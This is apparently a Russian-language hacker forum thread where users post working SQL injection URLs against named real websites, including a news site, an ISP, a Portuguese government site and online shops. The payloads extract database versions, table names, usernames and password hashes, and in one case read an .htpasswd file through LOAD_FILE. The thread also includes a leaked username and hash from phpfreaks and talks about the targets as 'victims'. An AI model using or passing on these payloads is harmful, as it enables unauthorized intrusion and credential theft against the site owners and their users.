phpfreaks.com Code: http://www.phpfreaks.com/user.php?cmd=view&user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat(username,0x3a,password),27,28,29,30,31,32,33,34,35,36,37,38,39+from+user+limit+0,1/* 36-37 тысяч юзеров.. phpfreak:d3d69778807f411f07768dd5ae7f194e:37
Code: http://www.diariodemadryn.com/vernoti.php?ID=63708+union+select+1,2,3,version(),user(),database(),7,8,9,10+limit+1,1/* www.mysql-hispano.org Code: http://www.mysql-hispano.org/page.php?id=43%20UNION%20SELECT%20version(),2+limit+1,1/* Code: http://sololiteratura.com/php/autor.php?id=-3+union+select+1,database(),version()/* Code: http://www.agenciapulsar.org/coberturas_det.php?id=-14+union+select+1,2,3,version()/*
А вот и скуля у падлючих комуняк. www.komunist.com.ua Code: http://www.komunist.com.ua/?news_id=9999+union+select+convert(version(),char)+from+users/* p.s.эх спасибо Грею, так бы до бесконечности подбирал еслиб не тайтл =)
Вроде колонка pass только ничего не выводит... Code: http://bvp.ru/libs/list.php?tid=-1+union+select+1,concat(id,char(58),name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors+limit+21,1/* Code: http://www.ont.by/index.php?id_sport=6&id=-1+union+select+1,2,3,database(),5,6,7,8,9,10,11/*
Чет мне с колонками не везет сегодня =( http://www.job4u.com.ua Code: http://www.job4u.com.ua/jobList.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26............ http://www.proformula.ua Code: http://www.proformula.ua/archive.phtml?id_rubric=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31..........
=( Code: http://www.goverla-tour.com.ua/country.php?countr_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51
www.gov-civil-aveiro.pt Code: http://www.gov-civil-aveiro.pt/printnoticia.php?id=-212%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9,10/*
Code: http://www.sotovikm.ru/tovar.php?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* сайт без формы, просто так запостил) Code: http://ccfrussia.ru/index.php?mod=p_article&p_id=-1+union+select+1,2,3,4,5,convert(table_name+using+latin1),7,8,9,10,11,12,13+from+information_schema.tables+limit+62,1/* все не смотрел.. думаю, там тож ниче интересного.. мде.. не клюет че-то (c)
Автомагазин On-Line http://www.autogazeta.com/car.php?id=-1+union+select+1,table_name+from+information_schema.tables+limit+16,5/*
Code: http://www.acana.ru/acana.php?razdel_id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user+limit+0,1/* аналогичная ситуация..
Наконецто более\менее серьезная жертва =) lecos.com.ua Lecos Интерент Сервис Провайдер. Code: http://lecos.com.ua/new/mod.php?mod=userpage&menu=1002&page_id=-1+union+select+convert(concat(user(),char(58),version(),char(58),database()),char),2/*
Code: http://www.acana.ru/acana.php?razdel_id=-1+union+select+1,LOAD_FILE('/usr/local/apache/htdocs/admin/.htpasswd'),3,4,5,6/* ^^ LOAD_FILE, etc... =)
http://www.liljas-library.com/section.php?id=21+order+by+11/* ЖЕЕЕСТЬ - см щапку... ужос.. (клабонервным не ссать, не такая уж и жесть)
Code: http://dvdselect.ru/podrobno.php?dvd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* табл не подобрал
